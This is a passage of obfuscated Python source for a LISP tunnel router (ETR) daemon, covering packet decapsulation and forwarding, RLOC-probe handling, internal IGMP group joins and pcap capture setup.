if ( packet . lisp_header . get_instance_id ( ) == 0xffffff ) :
iiIiII11i1 = packet . packet [ 36 : : ]
oOo00Ooo0o0 = iiIiII11i1 [ 28 : : ]
I11Iii1 = - 1
if ( lisp . lisp_is_rloc_probe_request ( oOo00Ooo0o0 [ 0 : 1 ] ) ) :
I11Iii1 = struct . unpack ( "B" , iiIiII11i1 [ 8 : 9 ] ) [ 0 ] - 1
if 33 - 33: I11i
ooooooo00o = packet . outer_source . print_address_no_iid ( )
lisp . lisp_parse_packet ( o0oOoO00o , oOo00Ooo0o0 , ooooooo00o , 0 , I11Iii1 )
return
if 87 - 87: OoOoOO00 / IiII + iIii1I11I1II1
if 93 - 93: iIii1I11I1II1 + oO0o % ooOoO0o
if 21 - 21: OOooOOo
if 6 - 6: IiII
if 46 - 46: IiII + oO0o
if 79 - 79: OoooooooOO - IiII * IiII . OoOoOO00
if ( lisp . lisp_ipc_data_plane ) :
lisp . dprint ( "Drop packet, external data-plane active" )
return
if 100 - 100: II111iiii * I11i % I1IiiI / I1ii11iIi11i
if 90 - 90: I1ii11iIi11i . ooOoO0o . OoOoOO00 . Ii1I
if 4 - 4: Ii1I + OoOoOO00 % I1ii11iIi11i / i11iIiiIii
if 74 - 74: II111iiii . O0 - I1IiiI + IiII % i11iIiiIii % OoOoOO00
if 78 - 78: Ii1I + OoOoOO00 + IiII - IiII . i11iIiiIii / OoO0O00
lisp . lisp_decap_stats [ "good-packets" ] . increment ( len ( packet . packet ) )
if 27 - 27: Ii1I - O0 % I11i * I1Ii111 . IiII % iIii1I11I1II1
if 37 - 37: OoooooooOO + O0 - i1IIi % ooOoO0o
if 24 - 24: OoOoOO00
if 94 - 94: i1IIi * i1IIi % II111iiii + OOooOOo
packet . strip_outer_headers ( )
iIIi11 = lisp . bold ( "Forward" , False )
if 54 - 54: Ii1I - I1Ii111
if 81 - 81: IiII . O0 + II111iiii * iIii1I11I1II1 * OOooOOo / OoOoOO00
if 88 - 88: II111iiii - o0oOOo0O0Ooo * I1IiiI . OoO0O00
if 65 - 65: IiII . i1IIi
OOOoO0 = False
oo0oo = packet . inner_dest . is_mac ( )
if ( oo0oo ) :
packet . packet = lisp . lisp_mac_input ( packet . packet )
if ( packet . packet == None ) : return
iIIi11 = lisp . bold ( "Bridge" , False )
elif ( packet . inner_version == 4 ) :
OOOoO0 , packet . packet = lisp . lisp_ipv4_input ( packet . packet )
if ( packet . packet == None ) : return
if ( OOOoO0 ) :
o0oOOO0 = lisp . lisp_process_igmp_packet ( packet . packet )
if ( type ( o0oOOO0 ) != bool ) :
oOoOOOo ( o0oOoO00o , o0oOOO0 )
return
if 49 - 49: i11iIiiIii % OoOoOO00 + I1Ii111 . II111iiii % iII111i * OOooOOo
if 67 - 67: i1IIi
packet . inner_ttl = packet . outer_ttl
elif ( packet . inner_version == 6 ) :
packet . packet = lisp . lisp_ipv6_input ( packet )
if ( packet . packet == None ) : return
packet . inner_ttl = packet . outer_ttl
else :
lisp . dprint ( "Cannot parse inner packet header" )
return
if 5 - 5: II111iiii . OoooooooOO
if 57 - 57: I1IiiI
if 35 - 35: OoooooooOO - I1Ii111 / OoO0O00
if 50 - 50: OoOoOO00
if 33 - 33: I11i
if 98 - 98: OoOoOO00 % II111iiii
if 95 - 95: iIii1I11I1II1 - I1Ii111 - OOooOOo + I1Ii111 % I1ii11iIi11i . I1IiiI
if 41 - 41: O0 + oO0o . i1IIi - II111iiii * o0oOOo0O0Ooo . OoO0O00
if 68 - 68: o0oOOo0O0Ooo
if 20 - 20: I1Ii111 - I1Ii111
if ( packet . inner_dest . is_multicast_address ( ) == False ) :
O0oOoOO = lisp . lisp_db_for_lookups . lookup_cache ( packet . inner_dest , False )
if ( O0oOoOO ) :
O0oOoOO . increment_decap_stats ( packet )
else :
lisp . dprint ( "No database-mapping found for EID {}" . format ( lisp . green ( packet . inner_dest . print_address ( ) , False ) ) )
if 37 - 37: IiII
return
if 37 - 37: Oo0Ooo / IiII * O0
else :
if ( lisp . lisp_db_for_lookups . lookup_cache ( packet . inner_source , False ) ) :
lisp . dprint ( "Discard echoed multicast packet (through NAT)" )
return
if 73 - 73: iII111i * iII111i / ooOoO0o
if 43 - 43: I1ii11iIi11i . i1IIi . IiII + O0 * Ii1I * O0
if 41 - 41: I1ii11iIi11i + Ii1I % OoooooooOO . I1ii11iIi11i + iII111i . iII111i
if 31 - 31: i11iIiiIii + II111iiii . iII111i * OoOoOO00
if 66 - 66: OoOoOO00 + i1IIi % II111iiii . O0 * I1ii11iIi11i % I1ii11iIi11i
if 87 - 87: OOooOOo + o0oOOo0O0Ooo . iII111i - OoooooooOO
if 6 - 6: iIii1I11I1II1 * OoooooooOO
if 28 - 28: Oo0Ooo * o0oOOo0O0Ooo / I1Ii111
if ( packet . is_trace ( ) ) :
if ( lisp . lisp_trace_append ( packet , ed = "decap" ) == False ) : return
if 52 - 52: O0 / o0oOOo0O0Ooo % iII111i * I1IiiI % OOooOOo
if 69 - 69: I1ii11iIi11i
if 83 - 83: o0oOOo0O0Ooo
if 38 - 38: I1Ii111 + OoooooooOO . i1IIi
if 19 - 19: iII111i - o0oOOo0O0Ooo - Ii1I - OoOoOO00 . iII111i . I1Ii111
i1Ii = "{} -> {}" . format ( packet . inner_source . print_address ( ) ,
packet . inner_dest . print_address ( ) )
if 48 - 48: iII111i + IiII
lisp . dprint ( "{} packet for EIDs {}: {} ..." . format ( iIIi11 , lisp . green ( i1Ii , False ) ,
# I1IiiI % i11iIiiIii % i1IIi % IiII
lisp . lisp_format_packet ( packet . packet [ 0 : 60 ] ) ) )
if 15 - 15: iIii1I11I1II1 . O0
if 70 - 70: Ii1I . i11iIiiIii % Ii1I . O0 - iIii1I11I1II1
if 26 - 26: OOooOOo
if 76 - 76: i1IIi * OoooooooOO * O0 + I1Ii111 * I1Ii111
if 35 - 35: o0oOOo0O0Ooo
if ( oo0oo ) :
packet . bridge_l2_packet ( packet . inner_dest , O0oOoOO )
return
if 73 - 73: O0 - I1ii11iIi11i
if 2 - 2: II111iiii / I1Ii111
if 54 - 54: i1IIi . I11i - I1ii11iIi11i + ooOoO0o + Oo0Ooo / Oo0Ooo
if 22 - 22: ooOoO0o . iIii1I11I1II1
if 12 - 12: Ii1I
if 71 - 71: I1IiiI . II111iiii . I1IiiI - ooOoO0o
if ( packet . inner_version == 6 ) :
packet . send_l2_packet ( oOOoo00O0O , i1111 )
return
if 45 - 45: IiII / O0 / OoOoOO00 * OOooOOo
if 18 - 18: iIii1I11I1II1 + OOooOOo + iIii1I11I1II1 . I1ii11iIi11i + I1Ii111 . ooOoO0o
if 7 - 7: I1ii11iIi11i + iIii1I11I1II1 * I11i * I11i / II111iiii - Ii1I
if 65 - 65: oO0o + OoOoOO00 + II111iiii
if 77 - 77: II111iiii
Iii = packet . get_raw_socket ( )
if ( Iii == None ) : Iii = i1
if 7 - 7: Oo0Ooo * OoooooooOO % O0 - Ii1I . Ii1I
if 80 - 80: OoOoOO00 - II111iiii
if 35 - 35: ooOoO0o - OoO0O00 . Oo0Ooo * Oo0Ooo / i11iIiiIii + I1ii11iIi11i
if 87 - 87: OoOoOO00 % iIii1I11I1II1
packet . send_packet ( Iii , packet . inner_dest )
return
if 72 - 72: OOooOOo . OOooOOo - I1ii11iIi11i
if 48 - 48: Oo0Ooo - ooOoO0o + Oo0Ooo - I1IiiI * i11iIiiIii . iII111i
if 35 - 35: IiII . O0 + Oo0Ooo + OOooOOo + i1IIi
if 65 - 65: O0 * I1IiiI / I1IiiI . OoOoOO00
if 87 - 87: II111iiii * I1ii11iIi11i % Oo0Ooo * Oo0Ooo
if 58 - 58: OOooOOo . o0oOOo0O0Ooo + I1IiiI % Oo0Ooo - OoO0O00
if 50 - 50: iII111i % II111iiii - ooOoO0o . i1IIi + O0 % iII111i
if 10 - 10: iII111i . i1IIi + Ii1I
if 66 - 66: OoO0O00 % o0oOOo0O0Ooo
if 21 - 21: OoOoOO00 - OoooooooOO % i11iIiiIii
if 71 - 71: i1IIi - I11i * I1Ii111 + oO0o - OoO0O00 % I1ii11iIi11i
def Ooo0oO ( lisp_raw_socket , packet , source ) :
global Ooo , o0oOoO00o
if 32 - 32: i1IIi . iII111i + II111iiii - OoO0O00 - iIii1I11I1II1
if 20 - 20: OoOoOO00 % I1ii11iIi11i
if 44 - 44: OoooooooOO . II111iiii . OOooOOo % OoooooooOO
if 86 - 86: i11iIiiIii + O0 * IiII - OoO0O00 * OOooOOo + O0
Oo0 = packet
packet = lisp . lisp_packet ( packet [ 8 : : ] )
if ( packet . lisp_header . decode ( Oo0 ) == False ) : return
if 94 - 94: I1Ii111 % II111iiii * i1IIi * iIii1I11I1II1
if 81 - 81: Oo0Ooo - I11i
if 24 - 24: OoooooooOO . OoO0O00 * II111iiii
if 59 - 59: I1Ii111 + OoO0O00 / OOooOOo
if 97 - 97: Oo0Ooo * iII111i % ooOoO0o . iII111i - I1Ii111 - OOooOOo
packet . outer_source = lisp . lisp_address ( lisp . LISP_AFI_IPV4 , source ,
lisp . LISP_IPV4_HOST_MASK_LEN , 0 )
if 79 - 79: I1IiiI - ooOoO0o
i1i1 = packet . decode ( False , Ooo ,
lisp . lisp_decap_stats )
if ( i1i1 == None ) : return
if 37 - 37: IiII . Oo0Ooo * Oo0Ooo * II111iiii * O0
if 83 - 83: IiII / I1Ii111
if 64 - 64: OoO0O00 % IiII . I1Ii111 % OoO0O00 + I11i * IiII
if 83 - 83: o0oOOo0O0Ooo % oO0o + I11i % i11iIiiIii + O0
if 65 - 65: iIii1I11I1II1 % oO0o + O0 / OoooooooOO
if 52 - 52: Ii1I % OOooOOo * I1IiiI % I11i + OOooOOo / iII111i
if 80 - 80: OoooooooOO + IiII
if ( lisp . lisp_flow_logging ) : packet . log_flow ( False )
if 95 - 95: I1Ii111 / oO0o * I1Ii111 - OoooooooOO * OoooooooOO % OoO0O00
packet . print_packet ( "Kernel-decap" , False )
lisp . dprint ( packet . lisp_header . print_header ( " " ) )
if 43 - 43: Oo0Ooo . I1Ii111
if 12 - 12: I1Ii111 + OOooOOo + I11i . IiII / Ii1I
if 29 - 29: IiII . ooOoO0o - II111iiii
if 68 - 68: iIii1I11I1II1 + II111iiii / oO0o
if 91 - 91: OoOoOO00 % iIii1I11I1II1 . I1IiiI
if 70 - 70: I11i % II111iiii % O0 . i1IIi / I1Ii111
if 100 - 100: I1ii11iIi11i * i11iIiiIii % oO0o / Oo0Ooo / ooOoO0o + I1ii11iIi11i
if 59 - 59: I1Ii111 - IiII
if ( lisp . lisp_decent_push_configured and
packet . inner_dest . is_multicast_address ( ) and packet . lisp_header . get_instance_id ( ) == 0xffffff ) :
if 14 - 14: iIii1I11I1II1 - iIii1I11I1II1
I11I1i1iI = packet . udp_sport
packet = packet . packet [ 28 : : ]
packet = lisp . lisp_packet_ipc ( packet , source , I11I1i1iI )
lisp . lisp_ipc ( packet , Ooo , "lisp-ms" )
return
if 5 - 5: IiII
if 84 - 84: II111iiii * oO0o * II111iiii % IiII / I1IiiI
if 100 - 100: IiII . Ii1I - iIii1I11I1II1 . i11iIiiIii / II111iiii
if 71 - 71: I1Ii111 * Oo0Ooo . I11i
if 49 - 49: IiII * O0 . IiII
if 19 - 19: II111iiii - IiII
if 59 - 59: o0oOOo0O0Ooo * OoO0O00 - Ii1I . OOooOOo
if 89 - 89: OOooOOo
if 69 - 69: ooOoO0o - OoooooooOO * O0
if ( packet . lisp_header . get_instance_id ( ) == 0xffffff ) :
iiIiII11i1 = packet . packet
oOo00Ooo0o0 = iiIiII11i1 [ 28 : : ]
I11Iii1 = - 1
if ( lisp . lisp_is_rloc_probe_request ( oOo00Ooo0o0 [ 0 : 1 ] ) ) :
I11Iii1 = struct . unpack ( "B" , iiIiII11i1 [ 8 : 9 ] ) [ 0 ] - 1
if 84 - 84: ooOoO0o + i11iIiiIii - OOooOOo * ooOoO0o
lisp . lisp_parse_packet ( o0oOoO00o , oOo00Ooo0o0 , source , 0 , I11Iii1 )
return
if 33 - 33: ooOoO0o % i1IIi - oO0o . O0 / O0
if 96 - 96: OoooooooOO + IiII * O0
if 86 - 86: Ii1I
if 29 - 29: iIii1I11I1II1 - OoO0O00 + I1IiiI % iIii1I11I1II1 % OOooOOo
if 84 - 84: IiII + I1ii11iIi11i + Ii1I + iII111i
if 62 - 62: i11iIiiIii + OoOoOO00 + i1IIi
if ( lisp . lisp_ipc_data_plane ) :
lisp . dprint ( "Drop packet, external data-plane active" )
return
if 69 - 69: OoOoOO00
if 63 - 63: OoO0O00 / OoOoOO00 * iIii1I11I1II1 . I1Ii111
if 85 - 85: i11iIiiIii / i11iIiiIii . OoO0O00 . O0
if 67 - 67: II111iiii / o0oOOo0O0Ooo . OOooOOo . OoooooooOO
if 19 - 19: IiII . I1ii11iIi11i / OoOoOO00
lisp . lisp_decap_stats [ "good-packets" ] . increment ( len ( packet . packet ) )
if 68 - 68: ooOoO0o / OoooooooOO * I11i / oO0o
if 88 - 88: o0oOOo0O0Ooo
if 1 - 1: OoooooooOO
if 48 - 48: ooOoO0o * OoOoOO00 - ooOoO0o - OOooOOo + OOooOOo
if 40 - 40: i11iIiiIii . iIii1I11I1II1
if 2 - 2: i1IIi * oO0o - oO0o + OoooooooOO % OoOoOO00 / OoOoOO00
if 3 - 3: OoooooooOO
if 71 - 71: IiII + i1IIi - iII111i - i11iIiiIii . I11i - ooOoO0o
if 85 - 85: I1ii11iIi11i - OoOoOO00 / I1ii11iIi11i + OOooOOo - iII111i
if ( packet . inner_dest . is_multicast_address ( ) == False ) :
O0oOoOO = lisp . lisp_db_for_lookups . lookup_cache ( packet . inner_dest , False )
if ( O0oOoOO ) :
O0oOoOO . increment_decap_stats ( packet )
else :
lisp . dprint ( "No database-mapping found for EID {}" . format ( lisp . green ( packet . inner_dest . print_address ( ) , False ) ) )
if 49 - 49: OoO0O00 - O0 / OoO0O00 * OoOoOO00 + I1Ii111
if 35 - 35: II111iiii . I1IiiI / i1IIi / I1IiiI * oO0o
if 85 - 85: II111iiii . ooOoO0o % OOooOOo % I11i
else :
if ( lisp . lisp_db_for_lookups . lookup_cache ( packet . inner_source , False ) ) :
lisp . dprint ( "Discard echoed multicast packet" )
return
if 80 - 80: oO0o * I11i / iIii1I11I1II1 % oO0o / iIii1I11I1II1
if 42 - 42: i1IIi / i11iIiiIii . Oo0Ooo * iII111i . i11iIiiIii * O0
if 44 - 44: i1IIi . I1IiiI / i11iIiiIii + IiII
if 27 - 27: OOooOOo
if 52 - 52: I1Ii111 % OoOoOO00 + iIii1I11I1II1 * oO0o . Ii1I
if 95 - 95: iIii1I11I1II1 . IiII - OoooooooOO * OoO0O00 / o0oOOo0O0Ooo
if 74 - 74: oO0o
if 34 - 34: iII111i
if ( packet . is_trace ( ) ) :
if ( lisp . lisp_trace_append ( packet , ed = "decap" ) == False ) : return
if 44 - 44: i1IIi % I1IiiI % o0oOOo0O0Ooo
if 9 - 9: Oo0Ooo % OoooooooOO - Ii1I
i1Ii = "{} -> {}" . format ( packet . inner_source . print_address ( ) ,
packet . inner_dest . print_address ( ) )
if 43 - 43: OoO0O00 % OoO0O00
lisp . dprint ( "{} packet for EIDs {}: {} ..." . format ( lisp . bold ( "NAT-Forward" , False ) , lisp . green ( i1Ii , False ) ,
# Ii1I * i11iIiiIii + iIii1I11I1II1
lisp . lisp_format_packet ( packet . packet [ 0 : 60 ] ) ) )
if 1 - 1: O0 * ooOoO0o / O0 . OOooOOo % oO0o
if 91 - 91: oO0o
if 72 - 72: II111iiii - OOooOOo + I1IiiI - I11i
if 91 - 91: II111iiii
if 53 - 53: OoO0O00 % o0oOOo0O0Ooo / OOooOOo % IiII % OoO0O00 % OoooooooOO
if ( packet . inner_version == 6 ) :
packet . send_l2_packet ( oOOoo00O0O , i1111 )
return
if 31 - 31: I1IiiI
if 73 - 73: ooOoO0o . O0 / o0oOOo0O0Ooo - OoooooooOO % i11iIiiIii
if 80 - 80: Ii1I / ooOoO0o % O0 . Oo0Ooo
if 63 - 63: OOooOOo . II111iiii . I11i
if 46 - 46: ooOoO0o % IiII - o0oOOo0O0Ooo - Oo0Ooo - Ii1I / I11i
Iii = packet . get_raw_socket ( )
if ( Iii == None ) : Iii = lisp_raw_socket
if 68 - 68: i1IIi - I1ii11iIi11i / Oo0Ooo % I11i . iII111i
if 9 - 9: IiII
if 48 - 48: o0oOOo0O0Ooo + o0oOOo0O0Ooo - Oo0Ooo
if 27 - 27: OoO0O00 + OoOoOO00 * ooOoO0o
packet . send_packet ( Iii , packet . inner_dest )
return
if 83 - 83: iIii1I11I1II1
if 72 - 72: I11i
if 87 - 87: i1IIi
if 48 - 48: Oo0Ooo * oO0o * iIii1I11I1II1 + i11iIiiIii - OoooooooOO
if 38 - 38: OoOoOO00 / iIii1I11I1II1 % i11iIiiIii - IiII * iII111i / OoOoOO00
if 13 - 13: OoO0O00 * I1ii11iIi11i - I1Ii111
if 79 - 79: oO0o % o0oOOo0O0Ooo % OoOoOO00
if 45 - 45: I1IiiI * OOooOOo % OoO0O00
def i111I11I ( group , joinleave ) :
ii111Ii11iii = lisp . lisp_lookup_group ( group )
if ( ii111Ii11iii == None ) : return
if 80 - 80: iIii1I11I1II1 - OoooooooOO - I1ii11iIi11i - I1ii11iIi11i . OoooooooOO
I1i = [ ]
for OO0Oooo0oOO0O in ii111Ii11iii . sources :
I1i . append ( [ OO0Oooo0oOO0O , group , joinleave ] )
if 2 - 2: I11i / OoO0O00 * oO0o % i11iIiiIii + IiII
if 3 - 3: IiII + II111iiii / iIii1I11I1II1
oOoOOOo ( o0oOoO00o , I1i )
return
if 10 - 10: II111iiii . O0
if 31 - 31: oO0o / i11iIiiIii / O0
if 39 - 39: I1IiiI + Oo0Ooo
if 83 - 83: i1IIi
if 76 - 76: Ii1I + iIii1I11I1II1 + OoOoOO00 . OoO0O00
if 49 - 49: IiII / ooOoO0o / OOooOOo
if 25 - 25: I1IiiI % O0 + i1IIi - ooOoO0o
if 38 - 38: o0oOOo0O0Ooo % I1Ii111 + i11iIiiIii + iII111i + ooOoO0o / i11iIiiIii
if 94 - 94: iII111i - Oo0Ooo + oO0o
if 59 - 59: I11i . I1IiiI - iIii1I11I1II1 + iIii1I11I1II1
if 56 - 56: oO0o + ooOoO0o
if 32 - 32: II111iiii + OoOoOO00 % ooOoO0o / OoOoOO00 + I1ii11iIi11i
if 2 - 2: i11iIiiIii - I1Ii111 + OoO0O00 % I11i * Ii1I
if 54 - 54: O0 - iII111i . OOooOOo % iII111i + iII111i
if 36 - 36: OOooOOo % i11iIiiIii
if 47 - 47: i1IIi + II111iiii . Oo0Ooo * oO0o . I11i / i1IIi
def i11ii ( ) :
global o0oOoO00o
if 83 - 83: I1ii11iIi11i * I1ii11iIi11i + OOooOOo
lisp . lisp_set_exception ( )
if 57 - 57: O0 - O0 . I1ii11iIi11i / o0oOOo0O0Ooo / Ii1I
I1IiII1I1i1I1 = socket . htonl
II11iiI = [ I1IiII1I1i1I1 ( 0x46000020 ) , I1IiII1I1i1I1 ( 0x9fe60000 ) , I1IiII1I1i1I1 ( 0x0102d7cc ) ,
I1IiII1I1i1I1 ( 0x0acfc15a ) , I1IiII1I1i1I1 ( 0xe00000fb ) , I1IiII1I1i1I1 ( 0x94040000 ) ]
if 45 - 45: OoooooooOO
OooOOOOoO00OoOO = b""
for I1oo in II11iiI : OooOOOOoO00OoOO += struct . pack ( "I" , I1oo )
if 17 - 17: O0 - OoOoOO00
if 81 - 81: I1IiiI - iIii1I11I1II1 / I1IiiI / O0
if 34 - 34: Ii1I * Ii1I - I1ii11iIi11i - O0 . i11iIiiIii
if 32 - 32: iIii1I11I1II1 . OoO0O00 * oO0o / OOooOOo . II111iiii - Oo0Ooo
if 10 - 10: I1ii11iIi11i / i11iIiiIii - Ii1I + oO0o * I1IiiI
while ( True ) :
OoooOo0 = getoutput ( "ls join-*" ) . replace ( "join-" , "" )
OoooOo0 = OoooOo0 . split ( "\n" )
if 20 - 20: II111iiii - I11i + i1IIi + Ii1I
for oOO0oo in OoooOo0 :
if ( lisp . lisp_valid_address_format ( "address" , oOO0oo ) == False ) :
continue
if 7 - 7: ooOoO0o + Ii1I
if 32 - 32: iIii1I11I1II1 % I1IiiI / i11iIiiIii + OOooOOo - o0oOOo0O0Ooo . iII111i
oo00 = ( oOO0oo . find ( ":" ) != - 1 )
if 35 - 35: ooOoO0o % I1IiiI - ooOoO0o - OoO0O00 - OoooooooOO
if 46 - 46: i1IIi . i1IIi . oO0o / I11i / ooOoO0o
if 34 - 34: OoooooooOO / Oo0Ooo * i11iIiiIii . II111iiii . OoooooooOO
if 59 - 59: i11iIiiIii . OoooooooOO / I11i * I1ii11iIi11i + OoooooooOO
Ii1I1i1ii1I1 = os . path . exists ( "leave-{}" . format ( oOO0oo ) )
lisp . lprint ( "Internal {} group {}" . format ( "leaving" if Ii1I1i1ii1I1 else "joining" , oOO0oo ) )
if 98 - 98: IiII * iIii1I11I1II1 . Ii1I * Oo0Ooo / I1ii11iIi11i + ooOoO0o
if 25 - 25: oO0o
if 19 - 19: I1IiiI % Ii1I . IiII * ooOoO0o
if 89 - 89: OoOoOO00 . OOooOOo
if 7 - 7: oO0o % OoOoOO00 - I1IiiI + Oo0Ooo
if ( oo00 ) :
if ( oOO0oo . lower ( ) . find ( "ff02:" ) != - 1 ) :
lisp . lprint ( "Suppress registration for link-local groups" )
continue
if 70 - 70: II111iiii + I1Ii111 + i11iIiiIii - i1IIi / IiII
i111I11I ( oOO0oo , ( Ii1I1i1ii1I1 == False ) )
else :
iI1IIiiIIIII = OooOOOOoO00OoOO
if ( Ii1I1i1ii1I1 ) :
iI1IIiiIIIII += struct . pack ( "I" , I1IiII1I1i1I1 ( 0x17000000 ) )
else :
iI1IIiiIIIII += struct . pack ( "I" , I1IiII1I1i1I1 ( 0x16000000 ) )
if 43 - 43: iII111i + Oo0Ooo / OoooooooOO
if 24 - 24: O0 + o0oOOo0O0Ooo * Ii1I - I1Ii111
ii = oOO0oo . split ( "." )
Ooo0OOoOoO0 = int ( ii [ 0 ] ) << 24
Ooo0OOoOoO0 += int ( ii [ 1 ] ) << 16
Ooo0OOoOoO0 += int ( ii [ 2 ] ) << 8
Ooo0OOoOoO0 += int ( ii [ 3 ] )
iI1IIiiIIIII += struct . pack ( "I" , I1IiII1I1i1I1 ( Ooo0OOoOoO0 ) )
I1i = lisp . lisp_process_igmp_packet ( iI1IIiiIIIII )
if ( type ( I1i ) != bool ) :
oOoOOOo ( o0oOoO00o , I1i )
if 20 - 20: iII111i / OOooOOo
time . sleep ( .100 )
if 28 - 28: ooOoO0o * I11i % i11iIiiIii * iII111i / Ii1I
if 41 - 41: OOooOOo - o0oOOo0O0Ooo + Ii1I
time . sleep ( 10 )
if 15 - 15: I11i / o0oOOo0O0Ooo + Ii1I
return
if 76 - 76: Ii1I + OoooooooOO / OOooOOo % OoO0O00 / I1ii11iIi11i
if 38 - 38: I1Ii111 . iII111i . I1IiiI * OoO0O00
if 69 - 69: o0oOOo0O0Ooo % i11iIiiIii / Ii1I
if 93 - 93: ooOoO0o
if 34 - 34: oO0o - ooOoO0o * Oo0Ooo / o0oOOo0O0Ooo
if 19 - 19: I1ii11iIi11i
if 46 - 46: iIii1I11I1II1 . i11iIiiIii - OoOoOO00 % O0 / II111iiii * i1IIi
if 66 - 66: O0
if 52 - 52: OoO0O00 * OoooooooOO
if 12 - 12: O0 + IiII * i1IIi . OoO0O00
def o0OO0oooo ( ) :
lisp . lisp_set_exception ( )
if ( lisp . lisp_myrlocs [ 0 ] == None ) : return
if 40 - 40: I1Ii111 - OoOoOO00 * I11i - IiII / OoOoOO00
if 71 - 71: oO0o / OoooooooOO % IiII / OoOoOO00 % I1Ii111
if 19 - 19: I1Ii111 + IiII / oO0o / II111iiii
if 92 - 92: i1IIi % ooOoO0o + ooOoO0o - iIii1I11I1II1 . Ii1I
if 33 - 33: o0oOOo0O0Ooo / O0 + OOooOOo
o0Ooo0o0Oo = lisp . lisp_get_all_multicast_rles ( )
if 55 - 55: iIii1I11I1II1 * iII111i
if 85 - 85: iIii1I11I1II1 . II111iiii
if 54 - 54: Ii1I . OoooooooOO % Oo0Ooo
if 22 - 22: OOooOOo
iIi1Ii = "any"
if 22 - 22: iII111i * I11i - Oo0Ooo * O0 / i11iIiiIii
if 78 - 78: Oo0Ooo * O0 / ooOoO0o + OoooooooOO + OOooOOo
if 23 - 23: iII111i % OoooooooOO / iIii1I11I1II1 + I1ii11iIi11i / i1IIi / o0oOOo0O0Ooo
oOoO = "(proto 2) or "
if 32 - 32: O0 + oO0o % Oo0Ooo
oOoO += "((dst host "
for iI1iI in lisp . lisp_get_all_addresses ( ) + o0Ooo0o0Oo :
oOoO += "{} or " . format ( iI1iI )
if 100 - 100: ooOoO0o / ooOoO0o - OOooOOo % OOooOOo * oO0o / IiII
oOoO = oOoO [ 0 : - 4 ]
oOoO += ") and ((udp dst port 4341 or 8472 or 4789) or "
oOoO += "(udp src port 4341) or "
oOoO += "(udp dst port 4342 and ip[28] == 0x12) or "
oOoO += "(proto 17 and (ip[6]&0xe0 == 0x20 or " + "(ip[6]&0xe0 == 0 and ip[7] != 0)))))"
if 32 - 32: I1IiiI + I1ii11iIi11i - oO0o + I1ii11iIi11i / i1IIi * oO0o
if 90 - 90: Ii1I % oO0o
lisp . lprint ( "Capturing packets for: '{}' on device {}" . format ( oOoO ,
iIi1Ii ) )
if 6 - 6: OoooooooOO / i11iIiiIii / I1Ii111
if 60 - 60: I1IiiI % oO0o / o0oOOo0O0Ooo % oO0o * i11iIiiIii / iII111i
if 34 - 34: I1Ii111 - OOooOOo
if 25 - 25: oO0o % I1IiiI + i11iIiiIii + O0 * OoooooooOO
if ( lisp . lisp_is_python2 ( ) ) :
import pcappy
ooO0 = pcappy . open_live ( iIi1Ii , 1600 , 0 , 100 )
ooO0 . filter = oOoO
ooO0 . loop ( - 1 , i1II11Iii1I , [ iIi1Ii , i1 ] )
if 94 - 94: I11i . I1IiiI
if ( lisp . lisp_is_python3 ( ) ) :
import pcapy
ooO0 = pcapy . open_live ( iIi1Ii , 1600 , 0 , 100 )
ooO0 . setfilter ( oOoO )
while ( True ) :
oooO , OooOOOOoO00OoOO = ooO0 . next ( )
i1II11Iii1I ( [ iIi1Ii , i1 ] , None , OooOOOOoO00OoOO )
if 64 - 64: O0 % ooOoO0o
if 40 - 40: o0oOOo0O0Ooo + I11i
return
if 77 - 77: i11iIiiIii % IiII + I1Ii111 % OoooooooOO - I11i
if 26 - 26: Oo0Ooo + O0 - iIii1I11I1II1
if 47 - 47: OoooooooOO
if 2 - 2: OoOoOO00 % I1Ii111 * Oo0Ooo * OoOoOO00
if 65 - 65: i11iIiiIii + Oo0Ooo * OoooooooOO - OoO0O00
if 26 - 26: o0oOOo0O0Ooo % OOooOOo + OOooOOo % I11i * i11iIiiIii / iII111i
if 64 - 64: oO0o % OoOoOO00 / II111iiii % ooOoO0o - iII111i
def I1II1IiI1 ( ) :
global Ooo
global Oo
global o0oOoO00o
global i1
global oOOoo00O0O
global i1111
if 26 - 26: OOooOOo * Oo0Ooo
lisp . lisp_i_am ( "etr" )
lisp . lisp_set_exception ( )
lisp . lisp_print_banner ( "ETR starting up" )
if 31 - 31: I11i * oO0o . Ii1I
if 35 - 35: I11i
if 94 - 94: ooOoO0o / i11iIiiIii % O0
if 70 - 70: I11i - Oo0Ooo / OoooooooOO % OoooooooOO
lisp . lisp_get_local_interfaces ( )
lisp . lisp_get_local_macs ( )
if ( lisp . lisp_get_local_addresses ( ) == False ) : return ( False )
if 95 - 95: OoooooooOO % OoooooooOO . Ii1I
if 26 - 26: oO0o + IiII - II111iiii . II111iiii + I1ii11iIi11i + OoOoOO00
if 68 - 68: O0
if 76 - 76: I1ii11iIi11i
if 99 - 99: o0oOOo0O0Ooo
if 1 - 1: Ii1I * OoOoOO00 * OoO0O00 + Oo0Ooo
if 90 - 90: I1Ii111 % Oo0Ooo - Oo0Ooo . iIii1I11I1II1 / OOooOOo + I11i
if 89 - 89: oO0o
if 87 - 87: iII111i % Oo0Ooo
if 62 - 62: OoO0O00 + ooOoO0o / iII111i * i11iIiiIii
if 37 - 37: iII111i
if 33 - 33: OoO0O00 - O0 - OoO0O00
if 94 - 94: IiII * I11i * OoooooooOO / o0oOOo0O0Ooo . IiII - o0oOOo0O0Ooo
if 13 - 13: OOooOOo / IiII - OoO0O00 / OOooOOo . i1IIi
if 22 - 22: O0 - I11i + I1Ii111 . Ii1I * i1IIi
OO0Oooo0oOO0O = lisp . lisp_open_listen_socket ( "0.0.0.0" , str ( I1Ii11I1Ii1i ) )
OO0Oooo0oOO0O . setsockopt ( socket . IPPROTO_IP , socket . IP_MULTICAST_TTL , 32 )
Oo = OO0Oooo0oOO0O
if 26 - 26: iIii1I11I1II1 * o0oOOo0O0Ooo . I11i
if 10 - 10: I1Ii111 * oO0o % Oo0Ooo - I11i % Oo0Ooo
if 65 - 65: iII111i * iIii1I11I1II1 / O0 . I11i
if 94 - 94: Oo0Ooo . ooOoO0o * i11iIiiIii - o0oOOo0O0Ooo . iII111i
Ooo = lisp . lisp_open_listen_socket ( "" , "lisp-etr" )
if 98 - 98: OOooOOo + Ii1I
o0oOoO00o [ 0 ] = Oo
o0oOoO00o [ 1 ] = lisp . lisp_open_send_socket ( "" , lisp . LISP_AFI_IPV6 )
o0oOoO00o [ 2 ] = Ooo
if 52 - 52: Oo0Ooo / OoOoOO00 - I1Ii111 . iII111i
if 50 - 50: iIii1I11I1II1 - iII111i - I11i
if 60 - 60: iIii1I11I1II1 * ooOoO0o
if 71 - 71: OoOoOO00 % Oo0Ooo % ooOoO0o
